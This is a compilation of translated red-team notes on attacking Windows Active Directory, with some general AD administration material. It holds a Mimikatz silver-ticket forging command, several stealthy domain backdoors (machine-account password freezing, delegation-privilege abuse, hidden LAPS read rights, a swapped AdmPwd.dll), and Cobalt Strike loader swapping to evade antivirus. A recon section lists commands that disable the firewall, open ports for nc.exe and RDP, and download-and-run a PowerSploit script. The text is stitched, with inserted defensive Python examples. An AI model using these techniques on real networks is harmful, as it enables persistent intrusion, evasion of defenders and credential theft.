This only demonstrates one specific form of ACL backdoor; there are many objects in the domain, and many ACLs that can be manipulated. The target ACL can be chosen flexibly as needed to hide the backdoor. Of course, Microsoft has also released a dedicated tool for ACL inspection, ACL Scanner; if checks of this type are run periodically, this backdoor can still be detected.

Silver tickets

In Windows systems many services run as the host account, that is, many service accounts are local machine accounts in the form ComputerName$. The following table lists common services that run as the host account.
Some entries in the right-hand column list several services; for example WMI needs HOST and RPCSS, which means two TGS tickets are needed at the same time to access WMI.

Service name            Service tickets required at the same time
WMI                     HOST, RPCSS
PowerShell Remoting     HOST, HTTP
WinRM                   HOST, HTTP
Scheduled Tasks         HOST
Windows File Share      CIFS
LDAP                    LDAP
Windows Remote Server   RPCSS, LDAP, CIFS

Knowing the password hash of the domain server's host account, Mimikatz's silver ticket function is used to forge a TGS for the HOST service, run SCHTASKS against the domain server with domain administrator privileges, and rem<br>otely create, view and delete system tasks.

Forging a silver ticket

kerberos::golden /admin:[email protected] /domain:testlab.com /sid:S-1-5-21-2390976136-1701108887-179272945 /target:TESTLABDC02.testlab.com /rc4:36788836f262b9409f102baa22b7a6f3 /service:host /ptt

Creating a scheduled task

Creating a backdoor by modifying the host account password policy

1. Modify the policy in the host's registry at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Netlogon\Parameters. The value is DisablePasswordChange; setting it to 1 prohibits changing the account password.
2. Modify the default of 30 days in Group Policy, at "Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Domain member: Maximum machine account password age". Setting it to 0 means unlimited.
3. Group Policy can directly prohibit host account password changes; this setting exists to support VDI (Virtual Desktop Infrastructure) and similar uses. The location is "Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Domain member: Disable machine account password changes".

Method 1 is relatively safe.
Since Group Policy keeps snapshots, methods 2 and 3 are riskier.

Creating a backdoor by modifying permission over the host account's delegation settings

In a domain delegation attack, if a host account is configured with constrained delegation, the host account's password hash together with that delegation can be used to obtain domain administrator privileges. The prerequisites are the host account's password hash and a delegation setting on it (constrained or unconstrained).

If we have several stable footholds in the domain and SYSTEM privileges on the current system, we can obtain the password hash of the current host's machine account (win7x86cn$ in the demonstration) at any time, which satisfies the first condition. If the SeEnableDelegationPrivilege right is given to the low-privilege domain user logged on to this machine (eviluser), the delegation settings of the win7x86cn$ account can be changed at any time through eviluser, which satisfies the second condition.

Holding GenericAll on the object is not enough to modify its msDS-AllowedToDelegateTo attribute; the attacker also needs the SeEnableDelegationPrivilege right. By default SeEnableDelegationPrivilege is only granted on domain controllers, so we need to find which group policies applied to the domain controllers changed the SeEnableDelegationPrivilege configuration. Generally this is the default "Default Domain Controllers Policy". The SeEnableDelegationPrivilege right is special: it is set by editing the GPO policy file, located at domain server\SYSVOL\sysvol\testlab.com\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf. Adding eviluser to SeEnableDelegationPrivilege there lets eviluser modify the delegation settings of all users in the domain.
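This backdoor leaves two artefacts a defender can check for: an extra holder on the SeEnableDelegationPrivilege line of the Default Domain Controllers Policy's GptTmpl.inf, and a delegation bit in the machine account's userAccountControl. As an added example (not from the original post), the following Python parses a constructed GptTmpl.inf fragment, flags any holder other than BUILTIN\Administrators (S-1-5-32-544, the only default holder on domain controllers), and decodes userAccountControl so that 16777216 (TRUSTED_TO_AUTH_FOR_DELEGATION) stands out. The domain SID and RID in the sample are made up.

```python
# Constructed GptTmpl.inf fragment in the layout of the Default Domain Controllers
# Policy; the second SID on SeEnableDelegationPrivilege is an added holder of the
# kind described above (both the domain SID and the RID are made up).
SAMPLE_GPTTMPL = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
SeEnableDelegationPrivilege = *S-1-5-32-544,*S-1-5-21-111111111-222222222-333333333-1105
SeInteractiveLogonRight = *S-1-5-32-544,*S-1-5-32-551
"""

ADMINISTRATORS_SID = "S-1-5-32-544"  # BUILTIN\Administrators, the default holder on DCs


def parse_privilege_rights(inf_text):
    """Return {privilege: [holder, ...]} from the [Privilege Rights] section."""
    section, rights = None, {}
    for raw in inf_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section != "Privilege Rights" or "=" not in line:
            continue
        name, _, value = line.partition("=")
        # Holders are comma-separated; SIDs carry a leading '*', plain names do not.
        holders = [h.strip().lstrip("*") for h in value.split(",") if h.strip()]
        rights[name.strip()] = holders
    return rights


def unexpected_delegation_holders(inf_text, expected=(ADMINISTRATORS_SID,)):
    """Holders of SeEnableDelegationPrivilege beyond the expected set."""
    holders = parse_privilege_rights(inf_text).get("SeEnableDelegationPrivilege", [])
    return [h for h in holders if h not in expected]


# userAccountControl bits relevant to machine accounts and delegation.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}
DELEGATION_BITS = 0x80000 | 0x1000000


def decode_uac(value):
    """Names of the flags set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def has_delegation(value):
    """True when unconstrained or protocol-transition delegation is enabled."""
    return bool(value & DELEGATION_BITS)


if __name__ == "__main__":
    for holder in unexpected_delegation_holders(SAMPLE_GPTTMPL):
        print(f"[!] extra SeEnableDelegationPrivilege holder: {holder}")
    # 4096 is a plain workstation account; 16781312 is the same account after
    # 16777216 was added, as in the Set-DomainObject demonstration above.
    for uac in (4096, 16781312):
        print(uac, decode_uac(uac), "delegation" if has_delegation(uac) else "no delegation")
```

Real GptTmpl.inf files are UTF-16 text, so read them with `encoding="utf-16"` before passing them in; comparing the parsed holder list against a baseline on every Group Policy change is what protects the file's integrity in practice.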
The following figure shows a test modifying the delegation settings of the win7x86cn$ account in eviluser's logon session. First the delegation settings of win7x86cn are queried; the useraccountcontrol value marked in red shows that no delegation is set. In the middle, Set-DomainObject is used to set delegation; 16777216 means TRUSTED_TO_AUTH_FOR_DELEGATION is set. The result is then queried with Get-DomainObject: the msds-allowedtodelegateto attribute has changed, and so has useraccountcontrol.

Security policy against this backdoor

Force a maximum host account password age of 30 days through the domain's group policy.
Protect the integrity of the {6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf file, that is, the integrity of the key group policy.
Mark high-privilege users as sensitive and not allowed to be delegated.
When a host account does need delegation, only configure constrained delegation.

LAPS

In a domain network the host's local administrator is rarely used, but it poses a great risk to network security. If an attacker obtains the local administrator's NTLM hash, there is no need to crack it: other hosts in the domain can be attacked through pass-the-hash (PTH). To address this, Microsoft released two patches in 2014, KB2871997 and KB2928120, after which this PTH method no longer worked. If the local administrator password of hosts in the domain is relatively simple it may still be cracked, and the password can still be used for password guessing or brute force with a dictionary, IPC or Remote Desktop logon, and so on. In 2015 Microsoft released the Local Administrator Password Solution (LAPS) to centrally manage the local administrator passwords of hosts in the domain.
LAPS policies force the local administrator password of each host in the domain to be randomized, preventing attackers from using a local administrator password for lateral movement inside the domain. The solution includes a client and a server component, installed on the hosts and on the domain server respectively.

LAPS functions

Collect the local administrator account according to policy (at most one local administrator account is managed) and set a random password that complies with the password policy.
Upload the new password to the domain server and store it in the attributes of the corresponding host account in the domain.
Update the new expiration date in the host account attributes.
Check whether the local administrator account password has expired; if so, generate a new random password and update the relevant attributes of the host account in AD.

LAPS provides two management tools: a GUI and the AdmPwd.PS script module. After LAPS is installed, the Set-AdmPwdComputerSelfPermission command of the AdmPwd.PS module is used to give the hosts in an OU, or in the entire domain, permission to set their own attributes, so that each host object can store its password plaintext and password expiration time by itself. On the domain server, the plaintext local administrator password of a specified host can be viewed directly in the GUI.

LAPS adds two attributes to host accounts in the domain: ms-Mcs-AdmPwd and ms-Mcs-AdmPwdExpirationTime. The first stores the plaintext local administrator password, the second the password expiration time. Some readers may ask why plaintext passwords are stored rather than some form of ciphertext. The Find-AdmPwdExtendedRights command of the AdmPwd.PS module can detect which accounts or groups in the domain have permission to read the ms-Mcs-AdmPwd attribute.
When checking AD permissions on a specific domain object, there are two things to consider: which domain principals can grant this AD permission to themselves or to other domain principals, and which existing ACEs contain this AD permission and which objects those ACEs apply to. For the first check, Find-AdmPwdExtendedRights does not examine the security descriptors at all. For the second check, the interface determines the result from four aspects: AD object type, ACE access mask, ACE object type, ACE inherited object type.

During AD object type detection, Find-AdmPwdExtendedRights only analyzes ACEs applied to OUs or computers; all other container objects are ignored. The parameter used when setting permissions with Set-AdmPwdComputerSelfPermission is also of OU type. An attacker can therefore grant himself permission to read the ms-Mcs-AdmPwd attribute on a non-OU container object. A container of type msImaging-PSPs is outside the scope of the detection analysis; if computer objects are placed in a container of this type, detection can be avoided. If a low-privilege user is given full permissions on a container of that type, he can control the attributes of the computers in the container, including the ms-Mcs-AdmPwd attribute.

win7x86user is an ordinary domain user. NotOu is a container of type msImaging-PSPs containing the machine win7x86cn. On NotOu, win7x86user is given all permissions on the container, and the object win7x86cn inside the container inherits them all.

The tests and experiments above show that in a domain network with LAPS deployed, LAPS itself can be used effectively as a hidden backdoor: a low-privilege user is given permission to read the plaintext local administrator password at any time, quickly obtaining control of a high-privilege host, and further obtaining domain control through hash harvesting and other methods.
Of course, the premise of all this is that domain control has already been obtained.

LAPS only deploys one file on the client, AdmPwd.dll, which responds to the password change policy from the domain server and then stores the plaintext password, protected by Kerberos encryption in transit, in the ms-Mcs-AdmPwd attribute of the corresponding host account on the server. LAPS originated from a public project, and by analyzing the public project's source code the password modification process can be simulated manually. When the client uses the AdmPwd.dll file, Windows performs no integrity or signature verification on it, so a tampered DLL works just as well. If an attacker compiles a DLL with similar functionality based on the public source code and adds code that writes the newly set plaintext password to a location of his choosing, he can obtain the plaintext password at any time and thus fully control the client.

According to the LAPS installation instructions there are three ways to install on the client:
Install LAPS.x64.msi or LAPS.x86.msi on the client.
Register the DLL on the client with regsvr32.exe AdmPwd.dll.

If LAPS is installed on the client in the second way and the directory holding AdmPwd.dll is writable by ordinary users, an ordinary user can directly replace the real DLL with the fake one, obtain the plaintext local administrator password, gain full control of the machine, and so escalate privileges.

LAPS is a solution Microsoft deployed to strengthen local administrator password management and improve network security, but some flaws in the solution have turned LAPS into a tool for attackers to create hidden backdoors. This is not unique to LAPS; many other products are the same. As products multiply, security improves, but the attack surface exposed to attackers also expands. The road to security is long.
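The practical countermeasure to the LAPS container trick above is to audit who can read ms-Mcs-AdmPwd on every object, not only on OUs and computers. As an added example that is not part of the original post, here is a Python audit over ACE records of the kind a collection script could pull from the directory: it reports every trustee able to read the attribute regardless of object class and shows what an OU-only scope misses. The three ACEs, the NotOu container and the trustees are constructed to mirror the test described above, and the flat record format is this example's own, not the output of any LAPS cmdlet.

```python
# Constructed ACE records (values invented); each is one access-control entry on a
# directory object, in this example's own flat format.
SAMPLE_ACES = [
    {"object": "OU=Workstations,DC=testlab,DC=com", "class": "organizationalUnit",
     "trustee": "TESTLAB\\Domain Admins", "rights": {"GenericAll"}, "attribute": None},
    {"object": "OU=Workstations,DC=testlab,DC=com", "class": "organizationalUnit",
     "trustee": "TESTLAB\\Helpdesk", "rights": {"ExtendedRight", "ReadProperty"},
     "attribute": "ms-Mcs-AdmPwd"},
    # The grant on the msImaging-PSPs container is inherited by win7x86cn inside it.
    {"object": "CN=NotOu,DC=testlab,DC=com", "class": "msImaging-PSPs",
     "trustee": "TESTLAB\\win7x86user", "rights": {"GenericAll"}, "attribute": None},
]

TARGET_ATTRIBUTE = "ms-Mcs-AdmPwd"


def grants_password_read(ace):
    """Can this ACE be used to read the confidential LAPS attribute?"""
    if "GenericAll" in ace["rights"]:
        return True
    # The attribute is confidential, so reading it needs an extended right (or
    # GenericAll); a broad ReadProperty grant is still worth surfacing to the auditor.
    if ace["rights"] & {"ExtendedRight", "ReadProperty"}:
        return ace["attribute"] in (None, TARGET_ATTRIBUTE)
    return False


def password_readers(aces, classes=None):
    """Trustees that can read ms-Mcs-AdmPwd; restricted to object classes if given."""
    readers = set()
    for ace in aces:
        if classes is not None and ace["class"] not in classes:
            continue
        if grants_password_read(ace):
            readers.add(ace["trustee"])
    return sorted(readers)


def missed_by_scope(aces, classes):
    """Readers that a class-restricted audit would not report."""
    return sorted(set(password_readers(aces)) - set(password_readers(aces, classes)))


if __name__ == "__main__":
    ou_only = {"organizationalUnit", "computer"}
    print("all readers:      ", password_readers(SAMPLE_ACES))
    print("OU/computer scope:", password_readers(SAMPLE_ACES, ou_only))
    print("missed:           ", missed_by_scope(SAMPLE_ACES, ou_only))
```

Feeding this from a real walk of the directory (Get-Acl over the AD: drive, or any LDAP library that exposes nTSecurityDescriptor) and alerting on any trustee outside the expected administrative groups covers the gap the post describes.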
10. AD Active Directory management

Concept of domain and Active Directory

Value of domain and Active Directory

Enforce security policies and desktop/application environments for terminal computers and users, with batch and automated deployment, reducing the day-to-day management burden and workload of IT staff.
Access control for services and resources in the domain (file and print sharing, etc.) can be combined flexibly with the enterprise's hierarchical organizational structure to meet complex management needs such as permission assignment.
Unified authentication can be integrated with a variety of Windows application services (such as Exchange, SharePoint, etc.) and third-party software to achieve single sign-on and improve the user's experience when switching between multiple services.

Roles in the domain

DC (Domain Controller)
Member server
Terminal computer

AD database files on the domain controller

The AD database files are stored in C:\Windows\NTDS by default.
When required during AD database maintenance, operations such as service start and stop, folder redirection, offline defragmentation, and backup and recovery can be performed.

AD database synchronization between domain controllers

The AD database is replicated between DCs when changes occur. The frequency and time windows of replication can be configured.

Special types of domain controller: RODC

An RODC holds a read-only replica of the AD database.
No changes to the database may be made locally on an RODC.
RODCs are suitable for deployment in remote branches that have no administrative requirements.

Global Catalog server (GC)

A GC is a special domain controller; at least one is deployed per domain.
A GC synchronizes data between domains in a multi-domain environment (not all data is synchronized; usually the data that needs to be synchronized is only 5% to 10% of the total AD database) to optimize global or cross-domain searches for applications such as Exchange Server.
Domain and Active Directory planning

Requirements for a multi-domain environment

A domain can contain one million objects, and technically most enterprises need only one domain.
Multi-domain deployment may need to be considered when the following requirements arise:
IT management policy requires separate or independent IT management boundaries.
Restructuring or mergers cause changes to the domain.
Domain transformation and migration require old and new domains to coexist for a time.

Distributed architecture of multiple domains

A domain forest can contain multiple domains, and a domain can contain multiple child domains.
The namespaces (FQDN domain name suffixes) of parent and child domains must remain consistent and contiguous.

Trust relationships between domains

Trust relationships enable cross-domain authentication and resource access.
If there is no trust relationship between domains, users in each domain can only access resources in their own domain.
Depending on the scenario, some trust relationships exist by default while others require manual configuration.

Sites

A site is a network containing specific IP subnets within the same domain, associated with specific domain controllers. The purpose of deploying multiple sites is to optimize replication and synchronization between DCs across sites, while letting clients prefer nearby DCs for communication and optimizing logon verification.

Active Directory planning

OU hierarchy planning
User and computer naming conventions
Group planning
Planning of AD management permissions

Object management in Active Directory

GUI management tools

Command-line management tools

DS command set: dsquery, dsadd, dsmod, dsmove, dsrm, etc.
PowerShell cmdlets: Get-ADDomain, New-ADUser, Search-ADAccount, etc.

Objects in Active Directory

Object: common objects include users, groups, computers, etc.
Container: built into the system; the default logical storage location for some objects.
Containers cannot be deleted or edited and cannot be nested further.
Organizational Unit (OU): created by users to customize the logical storage location of objects; supports a hierarchical structure and can be edited.

OU (Organizational Unit) planning

Generally the OU structure should reflect the organizational structure or geographical layout of the enterprise.
Whether object types are mixed within an OU depends on management needs.
The main function of OUs is to control the scope of Group Policy deployment and the delegation of management permissions in Active Directory.

Object type 1: users

Domain user logon

Domain username@domain name (such as [email protected])
Domain name\Domain username (such as abc\tester)

View the SID

Get-ADUser -Identity [username]

Creating and managing a single user

AD Users and Computers
AD Administrative Center

Creating and managing users in batch

The server's built-in command-line tools (such as csvde and ldifde)
Writing PowerShell scripts

Object type 2: groups

Purpose of groups

Set users' permissions or rights in batch.

Classification of groups

By whether built-in: built-in groups, custom groups.
By scope: local groups, global groups, universal groups.

Object type 3: computers

Passive domain join

The computer account was not created in Active Directory in advance. After the computer joins the domain, its account is automatically stored in the default Computers container.

Active (pre-staged) domain join

The administrator created a computer account in the specified OU in Active Directory in advance. After the computer joins the domain, it is associated with the account in that OU by matching computer name.

Computer account password / secure channel

The secure channel for communication between a domain-joined computer and the domain controller requires a password. It is generated locally by the client computer and uploaded to Active Directory on the domain controller for storage. By default the password is changed automatically every 30 days.
If the client computer fails to communicate with the domain controller for more than 30 days, the domain controller allows the secure channel to be maintained with the last expired computer account password stored in Active Directory, but for at most two password update cycles (60 days by default). Otherwise the secure channel is broken, the client effectively drops out of the domain, and users can no longer log in. Parameters such as the computer password update cycle and validity can be adjusted through Group Policy.

Finding and filtering objects

AD Users and Computers
AD Administrative Center
PS scripts

Delegation of AD management rights

Delegation of AD operations can be configured at OU level to assign common management tasks for the objects in the OU to designated users or groups, reducing the workload of domain administrators (such as modifying the attributes of department accounts, unlocking accounts, resetting account passwords, etc.).

RSAT tools

RSAT (Remote Server Administration Tools) can be used together with AD rights delegation to perform AD domain service operations remotely from a client operating system (such as resetting passwords, unlocking accounts, etc.).

Group Policy configuration

Group Policy overview

The essence of Group Policy is to modify the computer's registry in a friendlier way.
Each setting in Group Policy corresponds to a registry key value, achieving operational control of the operating system and applications.
Group Policy includes local group policy and domain group policy.
Local Group Policy: gpedit.msc
Domain Group Policy: configured and issued on the domain controller with the Group Policy tools.
Domain group policy helps with standardized, unified management of terminals in the domain and reduces staff workload.

Common uses of Group Policy

Account security / authentication policy
Startup/shutdown scripts
Folder redirection
Deploying printer / shared folder mappings
Client desktop environment settings
Setting parameters of Microsoft applications such as IE
Automatic software installation and deployment
Restricting which software may run
Firewall security settings

Classification of Group Policy

Dimension 1: by the stage at which the configuration takes effect
Computer Configuration
User Configuration

Dimension 2: by whether the configuration can be changed by the user
Policies
Preferences

Dimension 3: by configuration content area
Windows Settings
Administrative Templates

GPO configuration

The system contains two default GPOs:
Default Domain Policy: domain level, affects all computers and users in the domain.
Default Domain Controllers Policy: container level, affects all domain controllers.
Other GPOs need to be created, configured and linked manually.

Deployment notes

GPOs are configured on a domain controller and synchronized to the other domain controllers through the AD replication mechanism.
After a GPO is created and edited, it only takes effect once it is linked to the domain or an OU.
One GPO can be linked to multiple OUs, and one OU can have multiple different GPOs linked.
Deleting a GPO link does not delete the GPO, but deleting a GPO automatically deletes its links.
To stop a GPO from taking effect, disable a link to the GPO or disable the GPO as a whole.
You do not necessarily need to delete the GPO link or the GPO itself.

Scope of Group Policy

After creation a GPO cannot be applied directly to computers, users or user groups; it must be linked to a container or OU in Active Directory, or applied at the whole domain level.
By default a GPO takes effect for all computers/users under the domain or OU. For finer control of the scope, use Security Filtering or WMI Filtering.
A GPO can also have individual objects excluded from its default scope.

When Group Policy takes effect

When the computer starts, it automatically retrieves and applies the "Computer Configuration" entries.
When the user logs in, the "User Configuration" entries are automatically applied.
While the computer is on or the user is logged in, changes take effect after 90 to 120 minutes by default (a random offset of up to 30 minutes is added to the 90 minutes to avoid concurrent peaks; this interval is configurable).
The client can force retrieval and refresh of group policy with gpupdate /force.
Some settings only take effect after the computer is restarted or the user logs off and on again.

View the GPOs currently applied on the client:

gpresult /h d:\gporesult.html
gpresult /r

Group Policy processing principles

Inheritance principle: inheritance can be enabled or disabled.
Accumulation principle.
Priority principle: child OU > parent OU > domain > site > local policy.
Sequence principle: multiple GPOs in the same OU are applied in their listed order, top to bottom.
Other principles: an OU containing only computers applies only "Computer Configuration"; an OU containing only users applies only "User Configuration"; if an OU contains both computers and users, both types of configuration are applied (computer configuration takes precedence on conflict).

Other Group Policy operations

Group Policy backup and restore

A single GPO or all GPOs can be backed up.
A timestamp is recorded for each backup, so multiple historical versions can be kept and restored accurately.

Group Policy storage

Domain trust relationships

Concept of trust relationships

A domain is a security boundary.
If there is no trust relationship between domains, users in each domain can only access resources in their own domain. A trust relationship builds a bridge (trust path) between two domains, allowing domain user accounts to be used across domains and enabling cross-domain authentication and resource access.
Common scenarios for trust relationships include company mergers and acquisitions, external cooperation, Active Directory migration, etc.
Depending on the domain type, some trust relationships exist by default while others must be created manually.

Direction of trust relationships

Domain A -> one-way trust -> domain B: resources in domain A can be accessed by domain B.
Two-way trust between domain A and domain B: resources in domain A can be accessed by domain B, and resources in domain B can be accessed by domain A.

Transitivity of trust relationships

If a trust relationship is transitive, multiple transitive trusts are automatically chained together. If a trust relationship is not transitive, the trust chain is broken and the trusts cannot be connected automatically.

Intra-forest trust relationships

Inter-forest trust relationships

Shortcut trusts
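The Group Policy processing principles in this post (inheritance, accumulation, priority, link order) decide which GPO wins when several set the same value, which is exactly the question a defender asks when a "Domain member" machine-account setting from post 9 turns up with an unexpected value. As an added example, not part of the original post, the following Python resolves a constructed set of links in LSDOU order, honouring Enforced and Block Inheritance, and reports the winning GPO for each setting. GPO names, scopes and setting values are made up; the semantics follow the principles listed above.

```python
from dataclasses import dataclass, field


@dataclass
class GPO:
    name: str
    settings: dict
    enforced: bool = False


@dataclass
class Scope:
    """One link target: the site, the domain, or an OU on the path to the object."""
    name: str
    gpos: list = field(default_factory=list)  # index 0 is link order 1 (wins within the scope)
    block_inheritance: bool = False


def application_order(local, scopes):
    """GPOs in the order they are applied; later entries override earlier ones.

    `scopes` follow the local policy in LSDOU order: site, domain, OU, child OU...
    Local policy is always processed first. Block Inheritance on a scope drops the
    non-enforced links of every scope above it. Enforced links are applied after
    everything else, the one linked highest in the tree last, so it wins.
    """
    start = 0
    for index, scope in enumerate(scopes):
        if scope.block_inheritance:
            start = index
    order = list(local)
    for scope in scopes[start:]:
        order.extend(g for g in reversed(scope.gpos) if not g.enforced)
    for scope in reversed(scopes):
        order.extend(g for g in reversed(scope.gpos) if g.enforced)
    return order


def effective_settings(order):
    """Merge settings in application order: {setting: (value, winning GPO name)}."""
    result = {}
    for gpo in order:
        for key, value in gpo.settings.items():
            result[key] = (value, gpo.name)
    return result


def build_scenario(block_inheritance):
    """Constructed scenario: local policy, an empty site, the domain, one OU."""
    local = [GPO("Local Policy", {"MaxMachineAccountPasswordAge": 30, "ScreenSaverTimeout": 600})]
    scopes = [
        Scope("Site:HQ"),
        Scope("Domain:testlab.com", [
            GPO("Default Domain Policy", {"MinPasswordLength": 7}),
            GPO("Machine Account Hardening",
                {"MaxMachineAccountPasswordAge": 30, "DisableMachineAccountPasswordChanges": False},
                enforced=True),
        ]),
        Scope("OU:Workstations", [
            GPO("VDI Settings", {"DisableMachineAccountPasswordChanges": True,
                                 "MaxMachineAccountPasswordAge": 0}),
            GPO("Desktop Lockdown", {"ScreenSaverTimeout": 300}),
        ], block_inheritance=block_inheritance),
    ]
    return local, scopes


def resolve(block_inheritance):
    """Names in application order and the effective settings for the scenario."""
    local, scopes = build_scenario(block_inheritance)
    order = application_order(local, scopes)
    return [g.name for g in order], effective_settings(order)


if __name__ == "__main__":
    for blocked in (False, True):
        names, effective = resolve(blocked)
        print(f"block inheritance={blocked}: {' -> '.join(names)}")
        for key, (value, winner) in sorted(effective.items()):
            print(f"  {key} = {value!r}  (from {winner})")
```

In the scenario the OU-level "VDI Settings" GPO tries to disable machine account password changes, but the enforced domain-level GPO is applied last and keeps the 30-day rotation; with Block Inheritance on the OU the Default Domain Policy disappears from the result while the enforced GPO still applies.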
11. AV evasion by replacing the loader bundled with Cobalt Strike

Reason

For artifacts generated by Cobalt Strike, our usual approach is to generate shellcode and then write our own loader to load it. When I read the Cobalt Strike code that generates the artifact, I found the method very interesting: the author first writes a loader, then produces the artifact by patching the generated shellcode into that loader. For antivirus software doing static checks on such a binary, the first step is to find signature points in the shellcode and in the artifact template. So if we write a loader ourselves and replace the loader that ships with Cobalt Strike, we get an evasion effect. The focus of this article is not on thoroughly bypassing antivirus, only a proof of concept. The technique used is to implement the loader yourself and simply XOR the shellcode to bypass signature detection of the shellcode.

Tool introduction

Web people are always curious about binary. This is the artifact method I learned while reading Cobalt Strike. The software is just a proof of concept; I copied a lot of Cobalt Strike source code, mainly because I found the patching approach very interesting. The source code will be uploaded to GitHub together with the second article. The jar package can be decompiled by anyone, since it is not obfuscated. I will try it first: referring to the source, write the loader myself and replace resource/artifact.exe so that the artifact.exe generated by Cobalt Strike evades detection by default.

Select Script Console, then enter:

x transform(shellcode("your Listener name", "x86", false), "array")

Open the tool:

Copy into the text box and click Generate:

Select a folder to save.

Click, and the beacon checks in:
12. Internal network information gathering

Collecting local host information

Manual collection

Query network configuration

ipconfig /all

Query operating system and software information

Query operating system and version

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
systeminfo | findstr /B /C:"OS name" /C:"OS version"

Query system architecture

echo %PROCESSOR_ARCHITECTURE%

View installed software, versions, paths, etc.

wmic product get name, version
powershell "Get-WmiObject -class Win32_Product | Select-Object -Property name, version"

Query local services

wmic service list brief

Query process list

tasklist
wmic process list brief

View startup programs

wmic startup get command, caption

View scheduled tasks

schtasks /query /fo LIST /v

View host uptime

net statistics workstation

Query user list

net user
net localgroup administrators
# Query logged-on users:
query user || qwinsta

List or disconnect sessions between the local computer and connected clients

net session

Query port list

netstat -ano

View patch list

systeminfo
wmic qfe get Caption, Description, HotfixID, InstalledOn

Query local shares

net share
wmic share get name,path,status

Query the routing table and the ARP cache of all available interfaces

route print
arp -a

Query firewall configuration

Turn off the firewall

Windows 2003:
netsh firewall set opmode disable

Windows 2003 and later:
netsh advfirewall set allprofiles state off

Modify firewall configuration

Versions before Windows 2003:
netsh firewall add allowedprogram c:\nc.exe "allow nc" enable

Windows 2003 and later:
netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="C:\nc.exe"

Allow the specified program to connect out:
netsh advfirewall firewall add rule name="Allow nc" dir=out action=allow program="C:\nc.exe"

Allow port 3389 through:
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

Customize the firewall log location

netsh advfirewall set currentprofile logging filename "C:\windows\temp\fw.log"

View proxy settings

reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

Query and enable the remote connection service

View the remote connection port

reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber

0xd3d in decimal is 3389.

Enable port 3389 on Windows Server 2003

wmic path win32_terminalservicesetting where (__CLASS!="") call setallowtsconnections 1

Enable port 3389 on Windows Server 2008 and Windows Server 2012

wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS!="") call setallowtsconnections 1
wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName="RDP-Tcp") call setuserauthenticationrequired 1
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

Automated information collection

Host information collection in Empire

View local users, domain members, password set times, clipboard contents, basic system information, network adapter information, and share information:

usemodule situational_awareness/host/winenum
usemodule situational_awareness/host/computerdetails

Query current privileges

whoami

Three situations: local ordinary user, local administrator user, domain user.

Get the domain SID

whoami /all

Query details of a specified user

net user XXX /domain

Determine whether a domain exists

Using ipconfig

ipconfig /all

View detailed system information

systeminfo

Query the current logon domain and user information

net config workstation

Determine the primary domain

net time /domain

After executing the command there are three situations:
A domain exists but the current user is not a domain user: a system error occurs.
A domain exists and the current user is a domain user (as shown in the figure above).
The current network environment is a workgroup: the domain controller is not found.

Discovering live hosts in the internal network

Quick NetBIOS scan of the internal network

nbtscan.exe 192.168.1.0/20

Quick ICMP scan of the internal network

for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL="

ARP scan of the internal network

arp-scan tool:
arp.exe -t 192.168.1.0/20

ARPscan module in Empire:
usemodule situational_awareness/network/arpscan

Invoke-ARPScan.ps1 script in Nishang:
powershell.exe -exec bypass -Command "{Import-Module C:\windows\temp\Invoke-ARPScan.ps1;Invoke-ARPScan -CIDR 192.168.1.0/24}" >> C:\Windows\temp\log.txt

Scanning internal ports

Metasploit port scan

auxiliary/scanner/portscan/tcp

PowerSploit's Invoke-Portscan.ps1 script

powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/POwershellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts 192.168.1.0/24 -T 4 -ports '445,1433,8080,3389,80' -oA c:\windows\temp\rex.txt"

Nishang's Invoke-PortScan module

Invoke-Portscan -StartAddress 192.168.250.1 -EndAddress 192.168.250.255 -ResolveHost

Port banner information

Collecting basic domain information

Query domains

net view /domain

Query all computers in a domain

net view /domain:HACKE

Query the list of all users in the domain

net group /domain

Query all member computers in the domain

net group "domain computers" /domain

Query domain password policy

net accounts /domain

Get domain trust information

nltest /domain_trusts

Find domain controllers

View the domain controllers' machine names

nltest /DCLIST:DomainName

View the domain controllers' host names

nslookup -type=SRV _ldap._tcp.

View the current time

net time /domain

View the Domain Controllers group

net group "Domain Controllers" /domain
netdom query pdc

Get users and administrators in the domain

Query all domain users (queries the domain controller)

net user /domain

Get detailed information on domain users

wmic useraccount get /all

View existing users

dsquery user

Query local administrators group users

net localgroup administrators

Query domain administrator users

net group "domain admins" /domain

Query enterprise administrator users

net group "Enterprise Admins" /domain

Locating domain administrators

Common tools

PsLoggedOn.exe:
PsLoggedOn.exe \\DC

PVEFindADUser.exe:
PVEFindADUser.exe -current

netview.exe

nmap scripts

smb-enum-sessions.nse: collects information on domain controllers, obtaining host, user and other information.
